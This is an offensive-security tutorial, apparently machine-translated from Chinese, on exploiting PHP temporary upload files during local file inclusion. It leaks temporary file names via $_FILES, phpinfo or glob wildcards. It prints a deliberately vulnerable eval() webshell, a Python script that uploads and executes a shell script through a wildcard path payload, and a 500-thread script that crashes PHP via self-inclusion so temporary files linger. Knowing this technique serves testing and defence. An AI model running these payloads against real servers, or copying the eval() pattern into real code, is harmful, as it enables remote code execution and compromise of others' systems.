principle

towards PHP send out Post Data packets , If the package contains files , No matter what php Is there any logic in the code to handle file upload ,php Will save this file as a temporary file

• The file is stored in by default /tmp Directory 『 It can be done by php.ini Of upload_tmp_dir Specify the storage location 』
• The file named php[6 Random characters ], example ：phpG4ef0q
• If this request ends normally , Temporary files will be automatically deleted
• If it ends abnormally , For example, collapse , Temporary files may be permanently retained

stay The file contains a vulnerability When no available files are found , You can use this method , Find temporary file name , Then include ！

How to get temporary file name

$_FILES

Can pass $_FILES Get file information

Array
(
    [name] => run.sh
    [full_path] => run.sh
    [type] => 
    [tmp_name] => /tmp/phpoFnbQf
    [error] => 0
    [size] => 10
)

phpinfo

phpinfo The page will print out all variables in the current request context , If we go straight to phpinfo The page contains the file post request , Then you can find in the return package $_FILES Contents of variables , To get the temporary file name

glob

If none of the above methods can be implemented , stay Linux in , You can also use glob wildcard Location file

glob Easy to use ：

• * ： Instead of 0 Or Arbitrary characters
• ? ： Instead of 1 Characters
• [...]： Match one of the characters , example [a,b,c] Matching character a / b / c
• {a, b}： matching a perhaps b

How to use this file

Combination request

Although the file is automatically deleted after the request is completed , But we can execute shell and Upload files Combined in one request ,php The code is as follows ：

The php Can be executed directly shell, But this example only shows how to use temporary files

# a.php

<?php
	$code = $_GET['code'];
	eval($code);
?>

Python Script utilization

# run.sh  The contents of the document ：
# echo $PATH

import requests

#  Upload files at the same time , perform  shell
url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;"

r = requests.post(url, files={
    'file': open('./run.sh')})

print(r.text)

# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Extend the lifetime of temporary files

In some cases , We can't put Upload files and perform shell Put together , Use the following methods to make the file exist more time , So that it can be used in other places ！

Can pass File contains Give Way php Contain itself, resulting in an endless cycle , And then php The daemon will crash due to memory overflow , however php It won't quit directly because of mistakes , It empties its memory stack , To recover from errors , That's the guarantee web The normal operation of the service .

At the same time, the process Will also interrupt php Handling of temporary files , Although it will eventually be deleted , However, it is obvious that temporary files exist in the disk for a longer time than before ！

Based on this , We can write concurrent scripts , Constantly launch post File request

import requests
from threading import Thread

def test():
    url = "http://localhost:8080/include.php?file=include.php"
    r = requests.post(url, files={
    'file': open('./run.sh')})
    print(r.text)

lst = []
for _ in range(500):
    t = Thread(target=test)
    lst.append(t)
    t.start()

for item in lst:
    item.join()

You can see , When we ask , There are always temporary files on disk that have not been deleted . Until the request to stop , All files were deleted

At the same time , You can use the above... Elsewhere glob Path wildcard universal load temporary file

import requests

url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;"

r = requests.get(url)

print(r.text)

# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Reference resources

• No alphanumeric webshell It's an improvement

  https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

• PHP Thoughts on the mechanism and utilization of temporary documents

  https://www.anquanke.com/post/id/183046

• PHP The file contains a vulnerability ( utilize phpinfo) Reappear

  https://github.com/vulhub/vulhub/blob/master/php/inclusion/README.zh-cn.md

• glob(7) — Linux manual page

  https://man7.org/linux/man-pages/man7/glob.7.html

• Operating files and directories

  http://billie66.github.io/TLCL/book/chap05.html